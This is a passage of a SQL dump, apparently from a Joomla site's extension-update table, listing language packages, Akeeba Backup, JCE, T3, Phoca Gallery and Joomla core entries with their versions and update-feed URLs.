India','','pkg_ta-IN','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(31920,57,0,'Thai','','pkg_th-TH','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(31921,57,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(31922,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(31923,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(31924,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(31925,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.15','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-15.html',''),(31926,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',0,'5.0.2','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-5-0-2			\n		',''),(31927,129,0,'JCE 2.9.19','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.19','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-19-released',''),(31928,130,0,'T3 System Plugin','','t3','plugin','system',0,'3.0.7','','http://update.joomlart.com/service/tracking/j16/plg_system_t3.xml','http://www.joomlart.com/update-steps',''),(31929,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.3','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.3',''),(31930,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(31931,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(31932,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(31933,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(31934,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(31935,57,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(31936,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(31937,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(31938,57,0,'Danish','','pkg_da-DK','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(31939,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(31940,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(31941,57,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(31942,57,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(31943,57,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(31944,57,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(31945,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(31946,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(31947,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(31948,57,0,'French','','pkg_fr-FR','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(31949,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(31950,57,0,'German','','pkg_de-DE','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(31951,57,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(31952,57,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(31953,57,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(31954,57,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(31955,57,0,'Greek','','pkg_el-GR','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(31956,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(31957,57,0,'Italian','','pkg_it-IT','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(31958,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(31959,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(31960,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(31961,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(31962,57,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(31963,57,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(31964,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(31965,57,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(31966,57,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(31967,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(31968,57,0,'Russian','','pkg_ru-RU','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(31969,57,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(31970,57,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(31971,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(31972,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(31973,57,0,'Spanish','','pkg_es-ES','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(31974,57,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(31975,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(31976,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(31977,57,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(31978,57,0,'Thai','','pkg_th-TH','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(31979,57,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(31980,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(31981,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(31982,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(31983,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.15','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-15.html',''),(31984,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',0,'5.0.2','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-5-0-2			\n		',''),(31985,129,0,'JCE 2.9.19','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.19','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-19-released',''),(31986,130,0,'T3 System Plugin','','t3','plugin','system',0,'3.0.7','','http://update.joomlart.com/service/tracking/j16/plg_system_t3.xml','http://www.joomlart.com/update-steps',''),(31987,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.3','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.3',''),(31988,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31989,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31990,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.15','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-15.html',''),(31991,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31992,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31993,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31994,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.15','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-15.html',''),(31995,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31996,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31997,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31998,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.15','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-15.html',''),(31999,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32000,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32001,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32002,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32003,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.15','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-15.html',''),(32004,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32005,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32006,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32007,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.15','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-15.html',''),(32008,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32009,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32010,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32011,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32012,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.15','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-15.html',''),(32013,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32014,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32015,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32016,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32017,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.15','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-15.html',''),(32018,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32019,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32020,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32021,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-0.html',''),(32022,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32023,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32024,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32025,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32026,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-0.html',''),(32027,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32028,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32029,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32030,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32031,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-0.html',''),(32032,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32033,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32034,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32035,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-0.html',''),(32036,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32037,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32038,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32039,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32040,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-0.html',''),(32041,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32042,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(32043,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32044,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-2.html',''),(32045,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32046,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32047,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32048,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-2.html',''),(32049,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32050,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32051,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32052,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32053,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-2.html',''),(32054,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32055,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32056,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32057,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32058,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-2.html',''),(32059,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32060,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32061,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-2.html',''),(32062,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32063,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32064,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-2.html',''),(32065,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32066,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32067,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32068,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32069,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-2.html',''),(32070,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32071,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32072,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32073,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-2.html',''),(32074,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32075,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32076,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32077,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32078,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-2.html',''),(32079,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32080,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-2.html',''),(32081,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32082,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32083,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-2.html',''),(32084,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32085,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32086,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32087,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-2.html',''),(32088,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32089,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32090,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32091,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-2.html',''),(32092,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32093,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32094,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32095,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-2.html',''),(32096,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32097,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32098,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32099,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32100,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32101,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-2.html',''),(32102,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32103,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32104,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32105,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32106,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-2.html',''),(32107,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32108,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32109,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32110,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32111,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-2.html',''),(32112,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32113,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32114,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32115,1,0,'Joomla','','joomla','file','',0,'3.10.7','','https://update.joomla.org/core/extension.xml','',''),(32116,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-2.html',''),(32117,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32118,1,0,'Joomla','','joomla','file','',0,'3.10.6','','https://update.joomla.org/core/extension.xml','',''),(32119,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32120,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32121,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32122,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32123,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32124,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-2.html',''),(32125,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32126,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32127,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-2.html',''),(32128,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32129,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32130,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32131,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32132,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-2.html',''),(32133,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32134,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32135,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32136,67,0,'Akeeba Backup Core 